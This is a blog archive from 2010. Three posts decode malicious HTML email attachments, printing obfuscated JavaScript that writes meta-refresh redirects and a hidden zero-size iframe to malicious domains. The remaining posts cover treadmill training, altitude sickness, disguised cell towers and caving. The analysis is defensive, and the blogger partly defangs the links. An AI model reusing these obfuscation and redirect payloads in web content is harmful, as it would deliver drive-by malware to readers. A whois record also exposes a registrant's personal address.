Tuesday, September 21, 2010

Html virus inspired by a toy decoder ring

Here's a junior level virus attempt that's inspired by the cereal box decoder ring.
It's much easier to understand, and actually kinda fun to go through.

Subject: Please sign and send back to me asap


Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"

After decoding we have:

[less than symbol] script type='text/javascript'>

var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i <>; i\<>

m is empty
iterate over the length of s, i is the counter

This is the important part:
m += String.fromCharCode(s.charCodeAt(i) - 1);

pretty basic, shift the letters to the one before
n becomes m, f become e
Looking at
to see what's the order of the punctuation (! becomes space, # becomes ", etc)
The first character = becomes a less than symbol, but I removed it to keep things from executing.

meta http-equiv="refresh" content="0;url=http://partynear.ru" />

This rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m=[28th position] insert an &
m=[23rd position] insert an !

document.write(m) sends the string to the browser. The "refresh" is what makes it all happen.

So what is at partynear.ru?
Not much according to the text only browser Lynx. It says "Unexpected network read error"
jsunpack shows that there appears to be a redirect sending you further into the site into a Themes/card.js area that is trying to run another javascript. It's not clear if this is smoke or malware or something else.

Monday, September 20, 2010

Decoding html viruses followup

The last post was getting too long so it was time to start a new one.

Now the subject line says "contract for sports complex" and going to through some of the previous decoding steps and feeding it into jsunpack leads us to a complicated scenario that the CyberCrime & Doing Time blog goes into here.

The browser visits a hostile site

It tells me that x.html is
info: [meta refresh] URL=xxxvideo-eyyc.cz.cc/video7/?afid=24
info: [iframe] findepotdirect.com/news/

which just looks like your basic Can we sell you some cheap pills? SpamRx. or in this case a porn site. BUT! you get this free surprise inside an iframe (that's an HTML thingy).

The sports complex one I went through decoded to (I've removed the opening angle bracket to keep the browser from trying to interpret it and changed http to h.ttp):

PLEASE WAITING.... 4 SECONDS meta h.ttp-equiv="refresh" content="4;url=h.ttp://xxxvideo-eyyc.cz.cc/video7/?afid=24" /> iframe width="0" height="0" src="h.ttp://findepotdirect.com/news/"> /iframe>

So while you are seeing xxxvideo-eyyc.cz.cc your browser is getting something else entirely.
jsunpack tells me it contains a file called 3.wav file which I find pretty strange., but on further examination it's part of the xxxvideo porn site so it's more smoke.

What I need is more info about: findepotdirect.com/news

A quick google of findepotdirect.com/news shows one link and it was created by yours truly when I did the above jsunpack run.

So I finally finished my local install of the text only browser "Lynx" running on a Linux system only to find out the site is gratefully down.

However the domain name is owned by someone:
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com/whois.html
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 13-sep-2010
Creation Date: 13-sep-2010

Expiration Date: 13-sep-2011

And the contact info is hidden by the registrant Monkier:

Registrar: MONIKER

Registrant [3157846]:
Dennis Nanni root@munnuhome.com
6310 Rock Creek Rd
Tullahoma TN 37388 US

This domain was just registered a week ago, but still isn't really functional or was and is no longer.

So I still don't know what they're up to, but it's getting harder and harder to find out just what it is, though I have a feeling that if the findepotonline.com site answered then jsunpack would have more to say about it.

Decoding "html" viruses

My company has been getting a rash of viruses that come in as .html attachments.
The latest set has subject lines of "Delivery Status Notification (Failure)"

The interesting and useful thing about this viruses is that they are in obfuscated text form and you can decode them with effort.

If you look at the text it comes in as "Base 64" encoding and looks like:

Content-Type: text/html; name="4727911.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="4727911.html"
This example is:


Which you can put through a decoder at:


Which gives you a Javascript all on one very long line.

Then you can take that and put it through a "beautifier" at

Which yields something that looks like a long unerased whiteboard.
various things added lie [lessthan] to keep the system from thinking this is a script or html.

function etgr(zj4r) {
bo97, bvgy = "",
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s\"a[lessthan]",
p3je, j446 = iyv2.length;
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));
for (p3je = 0; p3je < bo97 =" zj4r.charAt(p3je);" kpn8 =" iyv2.indexOf(bo97);"> -1) {
kpn8 -= (p3je + 1) % j446;
if (kpn8 < 67y="%22%22;">s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a[lessthan]msatmsol[lessthan].ituqchiix-e[lessthan]u0:alpaxr");

So far the point of these viral scripts is to get the browser to go to a website and download and install malware. The majority of this script is junk. What you're looking for is something that can make a URL. So it's the longer lines that you want to look at.

Let's examine
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));

By putting the stuff in quotes into yet another online URL translator at

The first line says

function raiy(kuyc){bvgy =kuyc}

Define a function called raiy that takes a value called kuyc and sets bvgy equal to it.

and the next says


The second line means write nothing so that's more junk.

The line
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s\"a<",

Looks way odd, but remember most of this is smoke, so keep the elements in mind.
This line sets two variables kpn8 and iyv2
How are these used in the scripts?

kpn8 is used but its meaning is changed immediately:
kpn8 = iyv2.indexOf(bo97);

which given that bo97 is nothing ("") I actually don't know what indexOf nothing does but 0 seems a safe bet.

and iyv2

p3je, j446 = iyv2.length;

The length of that string is 31.
The last list called the previously defined function raiy and sends a 0 to it.

By the way, the meaning of the Javascript indexOf and charAt at explained here:

Looking back over the script I think we currently have a whole lot of possibly nothing.

The very last line is very suspect:

etgr("0i\"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a<.ituqchiix-e

Out of desperation I googled
and learned that other people where chasing the same thing down and were using this very cool (do I still get to say that?) site that also has an online decoder to which you can feed urls or scripts:


js unpack can handle multiple levels of Javascript so it goes through the same steps I did but then does another one.

And we get:
//eval function raiy(kuyc){bvgy+=kuyc}
//eval document.write(bvgy);bvgy="";
//document.write (s) [less than]meta equiv="refresh" content="0;url=http://numerouno-india.com/x.html">
[less than] meta http-equiv="refresh" content="0;url=h[.]ttp://numerouno-india.com/x.html" />

(I inserted the [.] to break the link.)

Bing Bing Bing! We have a winner - a URL. The jsunpack site goes on to check that the link has since been removed and is no longer a threat. Same scenario. Someone broke into that site and uploaded the virus x.html and then send out a bunch of .html emails that point to it and the victim's browser then downloads it and (if the use is an "Administrator") then installs it.

This is why on Windows it's a Really Good Idea to not be a user who has Administrator access when you're doing non-administrative things like reading email.

Now I really want to know how the unpacker was able to decode that last line in the scripts.

PS An excellent write up of an older (but easier to decipher) outbreak can be found at:

Thursday, September 16, 2010

Treadmill Running - a new record for slow

i managed to run 4 miles today on a treadmill. It took me 63 minutes which is close to what some people can walk, but I was running/jogging.

Same approach. Everytime my pulse got to 150 or 151 I dropped my speed by 0.1 or 0.2 mph. Started at 4.8 then to 4.6 then dropped it to 4.0 where I stayed until 2+ miles then I dropped it to sub 4.0 mph for the rest of the time.

While it was nice to know that I could go 4 miles which I've never done before, I think it might be a better use of my time to work on extending the amount of time that I can go at above 4.0 mph while keeping my pulse under 150 bpm. I can do this in 30 minutes instead of an hour (an hour on a treadmill is a long time even with music and watching cute kids learn soccer) unless I suddenly get a whole lot more fit and it takes longer for my pulse to go over 150. It's problems like these you wish for. The other cool thing was knowing that if I wanted to I could have gone longer.

I do need to replace my shoes as even though they've only been used on a treadmill they are less springy than they used to be.

Sunday, September 12, 2010

Treadmill Running Breakthrough

For a while now I've been struggling with the issue that after running a mile, my right foot starts to drag and this really limits how well I can improve endurance-wise. I'm in better shape than that and this is a major impediment.

The issue was twofold which has made solving it a bit harder.

Heat on my back was the major problem as when a spot on my spine got hot the nerve conduction was compromised. This week I solved this by running in a one piece bathing suit that doesn't have a back (I also wear shorts over it too.). Doing that seemed to make a difference, but I was still struggling some after about 1.3 miles.

That's when I went back and did some more research on endurance training. I discovered in an earlier post that I'd been happily running at 90% of my max which is great mountaineering training where you have to be able to work at or near the point where you are working anaerobically, but it you want to increase your endurance you have to go slower.

In "The Outdoor Athlete" by Courtenay and Doug Schurman (which you can get at http://bodyresults.com), they have a section on Endurance Training.
They define 4 levels of intensity

  • Recovery below 65% Maximum Heart Rate (MHR)
  • Distance Aerobic (low intensity) Session 65-75% MHR
  • Tempo Aerobic (medium intensity) Session 75-85% MHR
  • Anaerobic (high intensity) Session > 85% MHR

I'd been working out at 160 bpm so I choose 150 bpm (even before looking up the above) as a limit. That works out to be around 85% of my max heart rate. This is pretty high, but it's difficult for me to keep my working heart rate under that when I'm really exercising and it seemed worth trying as a starting point.

A note on Max heart rate. If you really want to know your max heart rate get on a treadmill with a heart rate monitor and run till you drop and note your heart rate as you're dropping. I am not joking. All of the formulas are just estimates. 220-your age is off (by 5 for me). Even the more accurate 209-.7(your age) is off as I get older. (I should probably insert the usual "Please consult with your Doctor before trying to establish your max heart rate" caveat.)

So after a light meal (1/2 a sandwich) and equipped with lemonade (though I usually have Gatorade), in my bathing suit and shorts with my ipod and heart rate monitor off the gym I went.

The gym wasn't crowded and was decently cool. There was a Lacrosse game going on in the closest field to me that I could watch and ponder if Lacrosse really did have rules as they claim.

I entered in my info to the treadmill and chose a starting speed of 5.0 mph which is the speed I'd been working at. My idea was every time my heart rate got to 150-151 bpm, I would decrease my speed by 0.1-0.2 mph, even past the point of what I considered ridiculous.

Very quickly I decreased my speed to 4.8 mph
Then sometime after that to 4.6 mph

At that speed I passed 1.0 mile and then 1.25 miles. No leg drag. Somewhere in there I dropped it down to 4.4 and then not long after that was around 4.0 mph, but I was still running and no leg drag (and I'm starting to marvel at this). 2 miles passed and I was still ok. (Whoa). Then my pulse started to climb and I dropped it into the 3.8 range which is a really fast walk for some people, but I was definitely jogging and getting a good benefit from it and was in the middle of being amazed that I was still going. I stopped paying as much attention to the details as I was so far past my goals but when I hit 2.85 I realized that I might be able to make 5K (3.25). Dropping my speed to 3.6 mph and even occasionally as low as 3.5 mph worked. I discovered this a little while back on a different run. Going really slow can be beneficial and a great confidence booster.

My foot started to get sore so I finally stopped at 55 minutes and 3.63 miles which is the furthest I've ever run in one session and I didn't stop to walk at all. All this from keeping my pulse right at or just under 150 bpm. I was never out of breath and at 160 bpm (90% MHR) I definitely get that way. As I got further into the run I had to pay more attention on my foot placement but I was not battling chronic leg drag.

So the lessons were. Do what works for you. Though definitely use outside advice as a guide, but do what works for your body. I had to mentally get past running so slow, but that was an excellent workout for me. I can speed up later as my endurance improves.

It's also kinda cool that I got past the 5k limit as then if I wanted to I could enter a 5k run though things change when you're the one controlling the speed (instead of the treadmill) and other people are whizzing by you and you can't help but want to speed up, but that's another challenge for another day. I'm going to celebrate this milestone. i think it's time to make chocolate chip cookies.

Friday, September 10, 2010

Endurance Training

So I've been working on increasing the level of intensity that I can work at. This means that I can function at 90% of my max heart rate.

However I'm finding that my endurance has not increased very much and it's possibly why at altitude that I quite literally run out of oxygen and my muscles stop functioning very well. I have always thought it was the altitude since it always happens at particular elevations and that might have something to do with it, but it could be that I can only maintain working at 90% for so long.

Aerobic training (the kind where you can continue on indefinitely) is more around 85% of your max heart rate so I think I need to spend some time forcing myself to stay at that rate which is surprisingly hard when you have the illusion that you can go faster/harder.

One reason it's taken me this long to figure this out is that I only recently addressed the issue of my getting too hot. When I over heat I tire very quickly and start to trip over my own feet. I finally figured out if I wear a one piece bathing suit with a mostly open back, then the air is able to move around my back and keeps me cooler (I wear shorts too to keep the ridiculous look under control.) During the very first workout I was able to go longer, but still ran into a wall at just past 2 miles, so now I can start to work on the endurance angle more.

This makes me think that when I climb Mt Hoffman I should wear a heart rate monitor (what a great tool), and try to stay at 85% and see if I have the same altitude issues.

Thursday, September 09, 2010

The Cell Phone Tower Fake Trees

I remember the first few times I saw a cell phone tower disguised as a tree. There was something very subtle about it. I think I had time to look at it while driving by (perhaps I was a passenger). It was this niggling, "hmmmmm" double take sort of thing. "There's something funny about that tree. Hey wait a sec that's not a real tree!" (Cue dramatic Sherlock Holmesian music) I remember I felt I had discovered something.

Then it was "What does it do?" Something made me glance at my phone and the bars were so maxed out I thought they'd fall off the display. "Er, gee you think it has to do with cell phones."

Multiple fake tree sightings have verified this and a quick Google confirmed it. And why didn't I do that when I first saw one? Maybe it's the quest and the weird intrigue about something hiding in plain sight.

Now I see them all the time. They totally jump out and I can cheerfully (what a geek) say look a fake tree, just like I was pointing out a Red Tail Hawk or something.


Of course disguising cell towers isn't just limited to trees.
This church has turned a macbre sculpture of a crucified Jesus into a cell phone tower.

A friend has also been photographing these anominallies:
Here's one on 101 N that has what appears to be two towers.

But her favorite is the magic pine tree that appears amongst all the palm trees in the middle of the desert off of I-210. I guess palm trees were on back order and that Home Depot had just run out. Brilliant.

Wednesday, September 08, 2010

Pushing a Bike Uphill is Great Exercise

I've discovered that if you're willing to push your mountain bike up hills that you can't ride up, you get great upper body (more like full body) exercise. Suddenly you have an excellent crosstraining solution. Certainly no shame in that. And the best part is you get to ride the bike down. Wheee! Especially on Mt. Diablo's fireroads that appear to be covered with a fine ball bearing gravel which I've slipped on more that once and have since bought cleats for this is very much a feature.

If you are willing to mix the two (walking and riding) you will find yourself going places that you couldn't of before. Just remember to bring plenty of food and water as you can go further than you would of anticipated.

More Altitude Thoughts

So the dilemma is. How do you ascend gradually when no places to stop exist?

Do you sleep as high as you can?
Above 8000' when I've increased my sleeping altitude more than 1500' I've gotten ill.
What's weird is that i can drive up to 10k' and been able to sleep ok, but walking up to that
elevation from 8500' is much harder.
Do you sleep a bit lower where you will likely get more rest but have to climb further?
At that lower elevation how long do you spend there? 1 day, 2 days, more?
I tend to still hit a wall at some point.
Or do you just take a longer (2-6 hours) break while ascending?
Tempting to try this. I've done a shorter version of this a few times which helps a little.
Or do you just suffer?
Which I know isn't terribly effective for me.

I'm going to Yosemite soon and I have to figure out how I want to do this. I think I need to see how high I can climb if i spend the night at a fairly high altitude. Tuloumne Meadows Campground is at 8600', but Whitney Portal is at 8350' and I know that with a 35-40# backpack I can only get up to Lone Pine at 9885' before I start to struggle and limp into Outpost Camp at 10,360'. So likely the only thing I would learn is whether I would do better without a heavy pack.

This all makes me crazy. Whitney I can likely find ways to make it work but other climbs like Shasta and Ranier break all of those altitude rules that my body seems to really like. There just aren't places to camp above a certain point. Sigh.

The altitude increase basics are no more than 1000' elevation gain in a 24 hour period (above say 8000'). I can do 1500', but when I try to do 2000' is when I often get ill. Everybody else gets to break these rules why can't I?

Mt Shasta Personal High Point and Futher Elevation Expermiments

More elevation navel gazing.

So on my most recent trip to Mt. Shasta with effort I got up to 11,125'.
I spent the night at Horse Camp (7900') and then we had porters lug our heavier equipment up to 50-50 at 9600'. With a night's sleep at Horse Camp I had no problem getting up to 9600'. Though a night's sleep at 50-50 didn't seem to make too much difference as it was still a struggle for me though at least this time I got past Helen "Lake" (10,400') and on to 11,125'.

Twice before I've climbed to Helen from Horse Camp. Sometimes it's easy sometimes it's not. I can't quite figure it out. I do wonder if I had spent another night at 50-50 if that would of made much difference but some while back on a group trip on the Hidden Valley route we spent two nights there and my climbing was still severely compromised despite being in excellent shape.

This is all starting to look like I might want to focus more on climbing on packed dirt (i.e. not scree and loose rock) since that's easier than snow, though when the snow is firm there's little difference between it and dirt. But snow softens through out the day and when the surface steepens and the day progresses you will find yourself kicking steps into the snow which takes effort. Even when you're using crampons you have to focus more on foot placement and that takes more effort than just hiking on a trail.

On dirt I've been past 13,000' and one time when we were up camping comfortably at 12,000' in the Mitre basin I know I could have summited Mt Whitney (whose newly remeasured altitude is 14,505') had I been anywhere near a good trail instead of trying not to slide down Crab Tree pass (12,600'). I've also been at Lower Boy Scout Lake and was able to climb past 13,000'. I've also been ill at LBSL and didn't recover even after a couple of days. Maddening.

In the Mitre Basin we slept at
Horseshoe Meadow Trailhead 10,200'
Some unidentified spot at 11,000' (what a slog that was because of the sand on the Pacific Crest Trail)
Then we went up through the Mitre Basin and slept at an unnamed lake just past Sky Blue Lake which was at 12,000.
Then I climbed up to nearly 13,000'.
At no time was I ill - I had a mild headache from driving up to Horseshoe Meadows, but it got better.

SO with a gradual ascent I am fine. Trouble is most climbs aren't nearly so accommodating in that respect. Counter intuitively starting high makes things easier because you're not expending nearly so much oxygen and energy, but that has its limits. It's tempting to test this out in Estes Park CO and at Hawaii's big island.

I had this idea that I'd drive up to Yosemite and climb Mt. Hoffman (10,850') twice to see if there was any difference between the first day and spending the night at 8200' and then doing it again. The other approach would be to drive up and do almost nothing and then try the climb the next day. (Maybe even try something higher like Mt Dana.)

The other funny thing is that I seem to have an internal altimeter. I hit a wall at 7200' and at 9600', but can adapt with time (usually an overnight), but if I'm tired I don't always adjust to 9600'. I'm also going to maybe not use Diamox, but instead use Aspirin to see if that makes a difference, because it thins your blood.

So I don't know how I'll get up Shasta. I know I can get up Whitney (need to get a permit for next year come Feb), but Shasta doesn't offer higher places to camp (besides the crowded and not pleasant Lake Helen). I need to find a way I can camp high without getting ill (by increasing my sleeping elevation no more than 1500') and then climb higher.

Tuesday, September 07, 2010

Deep Cave Exploration - Yikes!

In my continuing quest to be very well read and well watched in things I would never do on my own, I'm listening to a book on Deep Caving called Blind Descent (http://www.audible.com/pd?asin=B003L8GZLQ).

Now I like tourist caves where you go and see all the cool formations that form from something being dripped on or from for many millennia. They are beautiful.

I also like hiking and climbing up mountains partially for the physical challenge, but mostly for the view really, and to spend time in a lovely environment, breath some fresh air and just to get outside the box.

Deep caving offers precisely none of these features save for the extreme physical challenge.

To risk sounding like Andy Rooney. I don't get it.

To be fair I'm only half way through, though I have little doubt my view will change much. [I'm much further now and I was right.]

Features of deep caves
  • pitch blackness, no light at all, you are totally dependent on artificial illumination
  • they are flooded much of the year and such are very wet
  • they are surprisingly noisy because of wind
  • your sleeping accomodations might be a narrow wet ledge that you have to worry about rolling off ot
  • you go down first so when you "top out" you now have the hardest part of the climb still to go
  • there are myriad ways to die and nearly no help is available or what is is days away.
  • similar to mountaineering even the simplest of injuries are much more difficult to manage, even worse than mountaineering is the possibility of infection because of all the wet, dust, and silt is much higher. And the no help factor too.
Remarkably the main guy who leads a lot of the effort to discover the deepest cave seems pretty sane. His name is Bill Stone (ha) and you can see him speaking here at a Google "TED" conference:

National Geographic took at interest and has some information here:
and here

You can also learn to be a cave diver. That is also another thing that the touristy "oh look all the cool sealife" totally is appealing to me, but when you get down that deep it more looks like this photo of the US Deep Caving Team's webpage:
completely empty of life (well mostly).

As one reviewer of the book said. "It's all kinda creepy in a way." You are deliberately placing yourself in a really strange environment simply because no one else has yet been there. It is the last frontier on this Earth. Quite literally a journey towards the center of the Earth, and how people deal with being obsessed with finding the deepest cave in existence.

Of course the first or second thing that occurs to me is that this is a moving target in a way. Water, volcanoes and earthquakes are constantly reshaping the Earth. What is the lowest point now is very likely not going to continue that way for too long, but we are talking geologic time so it may not matter.

Saturday, September 04, 2010

The Churchill Downs Reality Check

There is going to be a National Dog Agility event in Louisville and some folks who are going are really interested in seeing Churchill Downs. I had to warn them about how disappointed I was when I finally got to see it many years ago. Churchill Downs is in the middle of Louisville, just like Santa Anita is right in the middle of Los Angeles. When I was there I had just seen Lexington and was so impressed by its beauty. I had this wonderous romatic visions of Churchill Downs when we arrived in Louisville. Wow what a let down.

This is what I was picturing (this is a track somewhere in Lexington.)

This shows what the area really looks like - I was so bummed:
Here is a link where you can view it yourself